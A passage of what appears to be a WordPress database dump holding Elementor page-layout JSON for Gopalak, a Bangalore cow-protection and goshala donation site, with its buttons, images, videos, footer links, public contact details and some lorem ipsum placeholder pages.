\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"css_filters_css_filter\":\"custom\",\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Shop With Us\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D5EBC1\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"},\"title_color\":\"#43693F\",\"title_typography_typography\":\"custom\",\"title_typography_font_family\":\"Itim\",\"title_typography_font_weight\":\"600\",\"description_color\":\"#43693F\",\"description_typography_typography\":\"custom\",\"description_typography_font_family\":\"Itim\",\"description_typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#B87100\",\"background_color_b_stop\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]}},\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\",\"background_background\":\"classic\",\"background_color\":\"#B87100\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#43693F\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_stop\":{\"unit\":\"%\",\"size\":86,\"sizes\":[]},\"background_color_b\":\"#B87100\"},\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\",\"background_color_b\":\"#FFCC2A\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\",\"title_color\":\"#43693F\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"text_color\":\"#43693F\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#D5EBC1\"},\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b6ac0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"a3cc846\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"793c8dc\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"72a7055\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16d59b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"94e41e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"af9eefd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9631635\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"61c526b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4046e16\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"acbd211\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2894738\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"a4c68e4\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1216c33\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aac0ac3\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"298cd32\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"d121900\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"4a280f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by\\u00a0<a href=\\\"https:\\/\\/themehunk.com\\/\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Themehunk<\\/a><\\/span><\\/p>\",\"align\":\"center\",\"text_color\":\"#020202\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7651,1373,'_elementor_page_assets','a:0:{}'),(7652,1375,'_elementor_edit_mode','builder'),(7653,1375,'_elementor_template_type','wp-page'),(7654,1375,'_elementor_version','3.7.6'),(7655,1375,'_wp_page_template','elementor_canvas'),(7656,1375,'_elementor_data','[]'),(7657,1375,'_elementor_page_assets','a:0:{}'),(7658,1376,'_elementor_edit_mode','builder'),(7659,1376,'_elementor_template_type','wp-page'),(7660,1376,'_elementor_version','3.7.6'),(7661,1376,'_wp_page_template','elementor_canvas'),(7662,1376,'_elementor_data','[]'),(7663,1376,'_elementor_page_assets','a:0:{}'),(7664,1377,'_elementor_edit_mode','builder'),(7665,1377,'_elementor_template_type','wp-page'),(7666,1377,'_elementor_version','3.7.6'),(7667,1377,'_wp_page_template','elementor_canvas'),(7668,1377,'_elementor_data','[{\"id\":\"b164a62\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c2a6c73\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a181b2e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d9bcd0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3b3bf1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"51282c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"84083e0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7669,1377,'_elementor_page_assets','a:0:{}'),(7686,1380,'_elementor_edit_mode','builder'),(7687,1380,'_elementor_template_type','wp-page'),(7688,1380,'_elementor_version','3.7.6'),(7689,1380,'_wp_page_template','elementor_canvas'),(7690,1380,'_elementor_data','[{\"id\":\"b164a62\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c2a6c73\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a181b2e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d9bcd0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3b3bf1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"51282c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"84083e0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7691,1380,'_elementor_page_assets','a:0:{}'),(7693,1381,'_elementor_edit_mode','builder'),(7694,1381,'_elementor_template_type','wp-page'),(7695,1381,'_elementor_version','3.7.6'),(7696,1381,'_wp_page_template','elementor_canvas'),(7697,1381,'_elementor_data','[{\"id\":\"b164a62\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c2a6c73\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"a181b2e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"d9bcd0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e3b3bf1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"51282c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"84083e0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7698,1381,'_elementor_page_assets','a:0:{}'),(7700,1382,'_elementor_edit_mode','builder'),(7701,1382,'_elementor_template_type','wp-page'),(7702,1382,'_elementor_version','3.7.6'),(7703,1382,'_wp_page_template','elementor_canvas'),(7704,1382,'_elementor_data','[{\"id\":\"3051cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49cbdad\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2074e4d\",\"elType\":\"widget\",\"settings\":{\"anchor\":\"home\"},\"elements\":[],\"widgetType\":\"menu-anchor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"e7e4c38\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"3778299\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"c923623\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#7EB087\",\"background_color_b\":\"#014C0B\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"916798d\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, 